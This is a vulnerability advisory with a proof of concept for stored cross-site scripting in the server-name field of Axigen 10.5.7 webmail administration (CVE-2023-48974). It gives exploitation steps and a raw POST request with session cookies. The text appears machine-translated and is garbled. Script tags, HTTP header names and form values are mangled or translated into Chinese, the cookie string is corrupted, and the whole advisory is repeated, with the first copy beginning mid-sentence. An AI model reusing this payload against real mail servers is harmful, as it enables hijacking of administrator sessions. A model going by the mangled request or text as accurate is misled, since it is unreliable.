#利用title: Axigen 10.5.7-持续的跨站点脚本
#日期: 2023-09-25
#利用作者: Vinnie McRae -Redteamer IT安全
#供应商homepage: https://www.axigen.com/
#软件link: https://www.axigen.com/mail-server/download/
#版本:(10.5.7)和Axigen Webmail的旧版本
#测试在: Firefox,Chrome
#CVE: CVE-2023-48974
描述
脚本(XSS)是由于未经设置或未经过滤的处理而引起的。这意味着
攻击者可以将恶意代码注入此参数,这将
然后在其他用户查看参数的页面时执行
使用。这会影响身份验证的管理员,攻击可以
用于攻击更多权限的其他管理员。
开发
1。登录为管理员
2。导航到“全局设置”
3。将服务器名称更改为ScriptTalert(1)/脚本
邮政请求的POC:
````````
post /?_ H=1BB40E85937506A7186A125BD8C57EFPAGE=GL_SET HTTP /1.1
HOST: LOCALHOST:9443
cookie: eula=true;
wmsessionObject=%7b%22ACCOUNTFILTER%22%3A%22%22%2C%22 CurrentDomainName%22%3A%22Axigen%22 Xaxigen%22%2C%22 currentPrincipal%22%22%3A%22NAD a%22%2C%22DOMAINFILTER%22%3A%22%22%2C%22 foldercipientfilter%22%22%3A%22%22%2C%2C%22 groupFilter%22%3A%22%22%22%22helpcontainer%22helpcontainer%22 22%3A% 22Opened%22%2C%22leftmenu%22%3A%5B%22Rights%22%2C%22 services%22C%2C%22C%22C%22C%22C%22 domains%22%2C%2C%22 logging%22%2C%2C%2C%22 logogging%22Logging%2C%2C%22 Backback UP%22%2C%22%22%5D%2C%22mlistFilter%22%22%3A%22%22%2C%2C%22 premiumfilter%22%3A%22%22%22%22%2C%2C%2C%22sslcertificateFilter%22%22%22%3A%3A%22%22%22%22%22%7D;
WebAdminismodified=false; WebAdminIsupDated=true; webadminissaved=true;
public_language=en; _hadmin=6A8ED241FE53D1B28F090146E4C65F52;
Menulefttopposition=-754
content-type:多部分/form-data;
边界=-------------------------------------------------- 41639384187581032291088896642
内容长度: 12401
连接:关闭
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='Servername_input'
ScriptTalet(1)/脚本
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data; name='primary_domain_input'
斧头
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='ssl_random_file_input'
-snip-
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='更新'
保存配置
---------------------------------------------- 41639384187581032291088896642-
````````
#_______________________________________
#vinnie McRae
#RedTeamer IT安全性
#blog: redteamer.de/blog-beitrag/
#日期: 2023-09-25
#利用作者: Vinnie McRae -Redteamer IT安全
#供应商homepage: https://www.axigen.com/
#软件link: https://www.axigen.com/mail-server/download/
#版本:(10.5.7)和Axigen Webmail的旧版本
#测试在: Firefox,Chrome
#CVE: CVE-2023-48974
描述
servername_input参数很容易受到存储的跨站点的影响脚本(XSS)是由于未经设置或未经过滤的处理而引起的。这意味着
攻击者可以将恶意代码注入此参数,这将
然后在其他用户查看参数的页面时执行
使用。这会影响身份验证的管理员,攻击可以
用于攻击更多权限的其他管理员。
开发
1。登录为管理员
2。导航到“全局设置”
3。将服务器名称更改为ScriptTalert(1)/脚本
邮政请求的POC:
````````
post /?_ H=1BB40E85937506A7186A125BD8C57EFPAGE=GL_SET HTTP /1.1
HOST: LOCALHOST:9443
cookie: eula=true;
wmsessionObject=%7b%22ACCOUNTFILTER%22%3A%22%22%2C%22 CurrentDomainName%22%3A%22Axigen%22 Xaxigen%22%2C%22 currentPrincipal%22%22%3A%22NAD a%22%2C%22DOMAINFILTER%22%3A%22%22%2C%22 foldercipientfilter%22%22%3A%22%22%2C%2C%22 groupFilter%22%3A%22%22%22%22helpcontainer%22helpcontainer%22 22%3A% 22Opened%22%2C%22leftmenu%22%3A%5B%22Rights%22%2C%22 services%22C%2C%22C%22C%22C%22C%22 domains%22%2C%2C%22 logging%22%2C%2C%2C%22 logogging%22Logging%2C%2C%22 Backback UP%22%2C%22%22%5D%2C%22mlistFilter%22%22%3A%22%22%2C%2C%22 premiumfilter%22%3A%22%22%22%22%2C%2C%2C%22sslcertificateFilter%22%22%22%3A%3A%22%22%22%22%22%7D;
WebAdminismodified=false; WebAdminIsupDated=true; webadminissaved=true;
public_language=en; _hadmin=6A8ED241FE53D1B28F090146E4C65F52;
Menulefttopposition=-754
content-type:多部分/form-data;
边界=-------------------------------------------------- 41639384187581032291088896642
内容长度: 12401
连接:关闭
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='Servername_input'
ScriptTalet(1)/脚本
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data; name='primary_domain_input'
斧头
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='ssl_random_file_input'
-snip-
----------------------------------------- 41639384187581032291088896642
content-disposition: form-data;名称='更新'
保存配置
---------------------------------------------- 41639384187581032291088896642-
````````
#_______________________________________
#vinnie McRae
#RedTeamer IT安全性
#blog: redteamer.de/blog-beitrag/